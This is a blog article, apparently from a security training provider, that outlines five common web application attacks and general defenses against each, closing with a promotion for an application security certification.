Common Web Application Attacks
15
Mar

Most Common Web Application Attacks and How to Defend Against Them

The modern information age has shifted almost every physical business to an online platform. To do so, one of the most popular ways is to have a web application for your business. The primary reason behind this popularity is that the internet serves as an inexpensive, easiest, and the fastest medium to communicate and share information. But this convenient way tags along with a number of serious cyber threats. As per Akamai’s State of the Internet Q4 2017 report, there has been a 10 percent increase in total web application attacks when compared with its Q4 2016 report. [1] Even Verizon’s DBIR data backs up Akamai’s claim in its 2016 and 2017 report which states, web application attacks were the most common pattern behind actual security breaches. From past several years, it has been noticed that web application attacks are potential or noisy with an attack to breach ratio, 100k to 1. This is because malicious hackers have now shifted to automation for finding the weak spots in your web applications. [2]

What is Web Application?

A web application is a client-server computer program which uses web browsers and web technology to allow its visitors to store and retrieve data to/from the database over the internet. You must have seen websites allowing data like personal details, credit/debit card numbers, etc., to be stored on a database belonging to the website for immediate and recurring use; this is possible with the help of web applications. It uses server-side scripts: PHP and ASP to handle data stored on a database through its interface or client-side scripts like HTML and JavaScript. Webmail, login forms, content management systems, shopping carts are a few great examples of web applications.

To understand the web application attacks, it would be better to take a closer look at its basic workflow. Web applications can be dynamic and static in nature, which decides whether a web application require server-side processing or not. Generally, a web application requires a web server for handling client requests, an application server to process the tasks commanded by the user, and a database to store the user data. The flow of a web application looks like –

[3]

Most Common Web App Attacks and Defending Solutions

Security Report for In-Production Web Applications Q2 2018 lists five common web application attacks, [2] which are –

1. Cross-Site Scripting (XSS)

Cross-site scripting is one of the most frequent web application attacks. Under cross-site scripting (or XSS), attacker embeds untrusted JavaScript snippets in the client-side scripts. This malicious snippet gets activated whenever a web page is loaded, to work as per the perpetrator’s intent. The code alters itself to get access to the user’s personal data as the victim clicks the URL. This XSS attack can also modify the web page of a website application to redirect its authorized users to scam sites.

XSS vulnerabilities can be avoided in three significant ways –

  • Escaping User Inputs

The data received by a web application is secured before making it available for the end user. This is referred to as escaping data or escaping data inputs. This methodology prevents interpretation of received data in any malicious manner. The web application is designed in such a way that it censors the received data and does not allow the characters (mainly, ‘<’ and ‘>’) to be rendered. If your web page doesn’t permit users to add their own code to your page, then it is easy for you to escape JavaScript and HTML scripts. But if your web application contains comment boxes or is itself a forum then you are left with a very few choices. In such a case, you can carefully choose which HTML entities you want to include in your web application.

  • Input Validation

Input validation ensures that your web application is providing trusted data and keeping away untrusted or malicious data from harming your database, web application, or end user’s personal data. Whitelisting is usually associated with the SQL injection but allowing good characters can prevent XSS attacks too. You must have seen trusted websites disallowing you to enter special characters in the text fields; it is one of the motives of input validation to prevent the web application from XSS attacks.

  • Sanitizing User Input

Data sanitization is the modification of input data to make sure that it is valid. It can be done by enclosing the received data in double quotes. This method is useful for web applications using HTML markup. By changing an invalid data to a valid form confirms that the received data won’t harm your web application or database.

All these three methods won’t be enough if implied on a standalone basis. But when implemented altogether, they can totally provide a defensive force to combat against XSS attacks.

2. SQL Injection (SQLi)

Under this web application attack, hackers inject malicious SQL commands into the entry fields to be executed in the backend database. This is particularly found in data-driven applications. SQL injections can be easily slipped into a web application if there are any loopholes in the software execution. With this kind of web application attack, perpetrators can alter or delete existing data and create false identities like becoming an impostor administrator of the database.

The basic solution to this web application attack is that all the input fields (such as text fields, comment boxes, etc.) of a web application should be double-checked. And, to filter out non-validated SQL statements from the genuine network traffic, you can integrate a web application firewall in your security system.

3. Automated Threats

An automated threat is a computer security threat in the form of software which is engineered in a way to perform a heavy amount of repetitive task. This is done by automation tools such as internet bots.

It is easy to differentiate between user entered data and automated data. The real-time bot detection technology can help you to eliminate automated threats to a great extent. Account aggregation, carding, scraping, Denial-of-Service (DoS) are few automated threats.

4. File Path Traversal

File path traversal is also known as directory traversal or backtracking. The primary objective of this web application attack is to access files and directories which are not placed under the ‘root directory’. Hackers access arbitrary files and directories by manipulating file variables (such as using dot-dot-slash, ../).

This web application attack can be avoided by input validation. Implementing required filters in your web application can eliminate the chances of hackers getting hold of arbitrary files and folders. Plus, upgraded web server software or any patching software can keep your web application protected from file path traversal attack.

5. Command Injection (CMDi)

Command injection is more likely to occur in a web application with possible vulnerabilities. Under this attack, notorious hackers inject operating system commands acting as pseudo system shell, which will then be executed through a web application. With the help of this attack, a hacker can use its pseudo system shell as an authorized user to gain access to critical data. This can occur due to a lack of proper input validation system.

Whitelist validation will help you to avoid command injection. And the most efficient way is to avoid “exec” out to the operating system if it is not required.

Learn Application Security with Us

This is just a glimpse of web application security. If you have a keen interest and passion for acquiring real-time concepts and skills of an application security engineer, then join our Certified Application Security Engineer (C|ASE) program. You’ll have the option to develop your technical skills to learn web application defense, application design and architecture, input validation, cryptography, and a lot more either in .NET or in Java.

Sources:

[1] https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/q4-2017-state-of-the-internet-security-report.pdf

[2] https://info.tcell.io/hubfs/DemandGen_Content/Research%20Papers/tCell_wp-stateofsecurity-2018-web.pdf

[3] http://www.extropia.com/tutorials/devenv/intro_to_app_dev.html

Editor's Note:
Reviewed by JoAnne Genevieve Green, Adjunct Professor – Cyber Crimes at the University of Pittsburgh and Dr. Ranjeet Kumar Singh, CEO, Sherlock Institute of Forensic Science India
  • 31
    Shares
get certified from ec-council

1 Response

  1. Pingback : My Homepage

Write for Us